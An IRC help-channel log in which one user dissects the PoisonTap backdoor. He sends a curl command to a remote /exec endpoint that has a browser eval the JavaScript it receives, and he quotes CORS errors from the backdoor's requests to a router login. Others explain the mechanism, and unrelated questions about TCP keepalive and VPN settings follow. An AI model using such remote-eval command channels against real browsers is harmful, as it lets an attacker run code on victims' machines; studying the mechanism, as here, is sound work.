19:43 < shtrb|laptop> SSLKEYLOGFILE is a env variable that you can use to decipher SSL/TLS traffic in wireshark (record what the browser does) - or look in the data tab (dev tools)
19:44 < shtrb|laptop> jamesc, https://jimshaver.net/2015/02/11/decrypting-tls-browser-traffic-with-wireshark-the-easy-way/ this is an example
19:44 < jamesc> yeah, i have it filtered by WS, im not sure why its empty, there is a websocket connection though
19:44 < grawity> reload to see it
19:47 < jamesc> WS is just empty
19:48 < jamesc> I can run curl 'http://ec2-18-188-133-5.us-east-2.compute.amazonaws.com:1337/exec?alert("hiya")' and have it pop a message
19:50 < jamesc> whoa, I just wrote "curl 'http://ec2-18-188-133-5.us-east-2.compute.amazonaws.com:1337/exec?alert("hiya")'" in this box, and the server console put out "on Apr 09 2018 17:48:09 GMT+0000 (UTC) HTTP server. URL /exec?alert(%22hiya%22)' requested." I didn't even execute that though, i just pasted the previous message I executed and changed the text in this text box to "hiya"
19:50 < shtrb|laptop> curl popup a message ?!
19:51 < grawity> it's certainly not a direct popup
19:51 < jamesc> wait what?
19:51 < jamesc> it is
19:51 < grawity> it's not
19:51 < jamesc> ok
19:51 < grawity> curl sends a standard "GET /exec?alert("hiya")" to http://ec2-18-188-133-5.us-east-2.compute.amazonaws.com:1337
19:51 < grawity> the server there takes the querystring and relays it to another connection (the websocket)
19:52 < grawity> over the websocket, it is received by JS on your browser
19:52 < jamesc> whatever it is that is a dialog box in my browser is what i get
19:52 < grawity> and that JS eval's the received data
19:52 < jamesc> ok
19:52 < jamesc> so there is an embedded page
19:52 < jamesc> that is receiving the command
19:52 < jamesc> or doing stuff with it
19:54 < grawity> so the embedded page ends up calling $.get(...), which is a jQuery function
19:55 < grawity> in jQuery, functions like get() add some extra custom headers, and that causes CORS to apply to those requests
19:55 < grawity> [disclaimer: I just found that on google]
19:55 < jamesc> jesus this embedded script is so hard to read
19:56 < jamesc> its four lines, each line is like 100000 yards long
19:56 < jamesc> function(d) is in there though
19:57 < jamesc> ok
20:01 < jamesc> here's part of it https://pastebin.com/gDkULJ5U
20:01 < jamesc> that relates to CORS
20:06 < jamesc> grawity , in this, "Failed to load http://192.168.0.1.ip.samy.pl/login: Redirect from 'http://192.168.0.1.ip.samy.pl/login' to 'http://buckeye-lab.smartrg.com/prime-home/control-panel/login?device=1CABC0:1CABC09732D0' has been blocked by CORS policy: No 'Access-Control-Allow-Origin' header is present on the requested resource. Origin 'http://192.168.15.1.ip.samy.pl' is therefore not allowed access." does that mean the header is
20:06 < jamesc> not present on the page requested or the page from where the request was made?
20:06 < shtrb|laptop> in the from part
20:08 < jamesc> so i just need to add that header to the request
20:08 < shtrb|laptop> You need Origin + Access-Control-Request-Method and Access-Control-Request-Header
20:10 < grawity> jamesc: the page requested
20:10 < grawity> the page that makes the request can't do anything about it
20:10 < grawity> since that'd be an easy way for malicious sites to bypass CORS
20:11 < grawity> shtrb|laptop: you don't need to add these headers manually -- the browser's XHR functions do that automatically anyway
20:12 < shtrb|laptop> grawity, I meant to add for curl if he wish to mimic the request
20:12 < shtrb|laptop> and -L
20:15 < jamesc> here are the headers from the page with the websocket connection when I issue the command https://pastebin.com/HDVdPBKX
20:15 < IamTrying> https://paste.ubuntu.com/p/FTM2k9Nrzc/ - Guru grawity, line 30 what value to insert? where line 5, line 7, line 11 confusing to shot myself.
20:16 < jamesc> and this is from another tab where I try to navigate to the same url https://pastebin.com/FasyFGnC
20:16 < grawity> jamesc: your another tab is completely irrelevant
20:16 < jamesc> i know im just trying to understand what is different
20:17 < jamesc> which is probably a bad heuristic
20:17 < grawity> you're looking at the wrong place
20:17 < grawity> the requests don't have to be different
20:17 < jamesc> but I am not able to visualize the whole thing
20:17 < jamesc> what i do see is that the headers are different
20:17 < grawity> what *causes* the requests is different
20:17 < jamesc> ok
20:18 < jamesc> yeah i think what causes the request from the embedded page is obviously jQuery, but I can't parse it all https://raw.githubusercontent.com/samyk/poisontap/master/backdoor.html
20:18 < grawity> you don't need to parse all of it
20:18 < jamesc> lol its huge
20:18 < grawity> "it's caused by jQuery"
20:18 < grawity> that's all
20:20 < jamesc> so if it is a request made by jQuery then CORS is engaged
20:21 < jamesc> that's the lesson
20:21 < grawity> in a way, yes
20:21 < zenix_2k2> so i have a question, i have 2 python scripts, one is a server and one is a client... and i am the server and i am currently having an established connection to the client... but how do i know whether my client shut down her/his computer or not ?
20:22 < zenix_2k2> cause each connection = a process, and i wanna check that in order to terminate some spare processes
20:22 < zenix_2k2> if you wonder why
20:22 < grawity> zenix_2k2: often the shutdown process will kill apps and tear down the connections
20:22 < grawity> if you want to detect unplanned poweroffs etc., you need some sort of ping/keepalive
20:22 < zenix_2k2> HHHHmmmm...
20:23 < shtrb|laptop> zenix_2k2, get yourself a keep alive (TCP or manual )
20:23 < grawity> TCP has a built-in keepalive feature (see setsockopt), but individual protocols can implement their own
20:23 < zenix_2k2> can that be done via python ?
20:23 < grawity> sure
20:23 < IamTrying> left=%defaultroute what does it mean? inet 10.1.0.11/16 or inet 10.2.44.145/16 ?
20:24 < grawity> zenix_2k2: https://stackoverflow.com/a/14855726/49849
20:24 < IamTrying> left=FQDN, leftnextop=FQDN - what is FQDN? is it default gateway or remote gateway?
20:24 < grawity> "FQDN" means the full domain name
20:24 < SporkWitch> https://lmgtfy.com/?q=FQDN
20:24 < grawity> but usually left= should be your own IP address
20:25 < grawity> left=217.136.1.1 should be fine, without leftid/leftsourceip
20:25 < grawity> also
20:25 < grawity> you said you're using strongswan, but your ike= and phase2alg= settings look like libreswan syntax
20:25 < grawity> don't mix the two
20:25 < jamesc> interesting, this is part of PoisonTap's readme "Any "X-Frame-Options" security on the domain is bypassed as PoisonTap is now the HTTP server and chooses which headers to send to the client"
20:26 < grawity> they're like openbsd and netbsd, same grandpa but grew up differently
20:26 < zenix_2k2> anyway, set_keepalive_linux(sock, after_idle_sec=1, interval_sec=3, max_fails=5)... should i keep it that way or should i change some of the arguments to make my connection more flexible ?
20:26 < grawity> jamesc: yes, but that only helps with the